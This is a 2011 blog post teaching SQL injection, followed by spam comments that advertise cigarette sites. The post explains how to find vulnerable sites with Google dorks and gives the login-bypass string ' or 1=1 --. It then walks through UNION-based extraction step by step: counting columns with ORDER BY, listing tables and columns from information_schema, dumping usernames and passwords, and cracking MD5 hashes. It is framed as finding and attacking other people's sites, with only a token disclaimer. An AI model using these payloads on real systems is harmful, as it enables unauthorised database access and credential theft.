Monday, October 31, 2011

SQL Injection


SQL Injection is a technique in which the hacker inserts SQL codes into a web Form to get Sensitive information like (User Name , Passwords). In fact, it is a technique to access the database of the website without authorization.

The SQL query looks like this in a database : 

SELECT * FROM users
WHERE Login Name = $_GET [‘Login Name’]
AND password = $_GET [‘password’]

After entering username and password , say admin and admin , then query becomes 

SELECT * FROM users
WHERE Login Name = admin
AND password = admin



HOW TO FIND A SITE VULNERABLE TO SQL INJECTION ?

Google is our friend. So, search using the following terms.

Inurl:admin login.asp
Inurl:login.asp
etc.. 

For complete list of Google Hacking keywords, go here. These are famously called as Google Dorks. All you need is a basic knowledge of advanced google searching.

1. Use a known username or admin.
2. Enter the string  ' or 1=1 – –    into the password box.
3. Submit.

.If you want to find SQLi vulnerability on a particular website, then also you can use google dorks.

To do this add a single quote(‘) at the end of the URL. If you get an error or blank page, the site is vulnerable to SQL injection.
 For example, if  the url is www.examplesite.com/view.php?id=47 then it should become www.examplesite.com/view.php?id=47' 

When you add single quote at the end of the URL, some data of the page is missing. Hence we can determine that it is vulnerable to SQl injection.

FINDING OUT THE NUMBER OF COLUMNS :

We can find this by simply adding “order by “ query at the end :
www.examplesite.com/view.php?id=47
 order by 1

It should return the page with no error.
Now add one more column to the above query. It looks like
www.examplesite.com/view.php?id=47 order by 2
We should increase the count until we get an error. When we get an error, it means that there are no more columns to return the results.

Let us say we got an error at the following query.
www.examplesite.com/view.php?id=47 order by 10
It means that the site has 9 columns.

 HOW TO FIND MOST VULNERABLE COLUMN :

www.examplesite.com/view.php?id=47 union select 1,2,3,4,5,6,7,8,9—

It should return the most vulnerable columns.

Some times it may not display the columns on your page. In such cases add ‘-‘ without quotes before 
your id number. This is to call a non existing page to display your data. i.e.,

www.examplesite.com/view.php?id=-47 union select 1,2,3,4,5,6,7,8,9—

WHAT ARE THE TABLES IN THE DATABASE ?

www.examplesite.com/view.php?id=-47 union select 1,table_name ,3,4,5,6,7,8,9 from information_schema.tables—

It gives us a list of tables.

Now search for the tables you are interested in. It means, a hacker generally looks for the tables that contain usernames and passwords.


So, Now we got the table. What next ? It is columns.

HOW TO FIND OUT THE COLUMN NAMES ?

www.
examplesite
.com/view.php?id=-47 union select 1,column_name ,3,4,5,6,7,8,9 from information_schema.columns where table_name=’yourtablename’—


Here, 'yourtablename' refers to the table which you selected recently.

it displays all the column names from the table



Let us extract the data now.

www.examplesite.com/view.php?id=-47 union select 1,column_name ,3,4,5,6,7,8,9 from yourtablename—

Here column_name refers to the desired columname say usernames.

Similarly, extract the passwords by changing column name.

Many websites encrypt the passwords unsing some encryption techniques like MD5 etc,. So decrypt them using decryptors.


Via : 101hacker

Note : FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR THE CONSEQUENCES.
If you enjoyed this post, make sure you subscribe to my RSS feed! Comments are encouraged

5 comments:
Write comments
  1. Howdy! This is my first comment here so I just wanted to give a quick shout out and tell you I really enjoy reading through
    your articles. Can you suggest any other blogs/websites/forums that
    cover the same topics? Thank you!
    Also visit my blog : buy cigarettes

    ReplyDelete
  2. If you want to increase your knowledge just keep visiting this
    web page and be updated with the hottest information
    posted here.
    Also visit my blog post cheap cigarettes

    ReplyDelete
  3. Link exchange is nothing else however it is just placing the other person's webpage link on your page at appropriate place and other person will also do same in support of you.
    Feel free to visit my web site : buy cigarettes online

    ReplyDelete
  4. Right here is the right webpage for anyone who really wants to find out about this topic.
    You realize so much its almost hard to argue with you (not
    that I personally would want to…HaHa). You certainly put a brand new spin on
    a topic that's been discussed for a long time. Wonderful stuff, just great!
    My site - newport coupon

    ReplyDelete
  5. Your style is very unique compared to other people I have read stuff from.
    I appreciate you for posting when you've got the opportunity, Guess I'll just book mark this site.
    Here is my website : davidoff cigarettes review

    ReplyDelete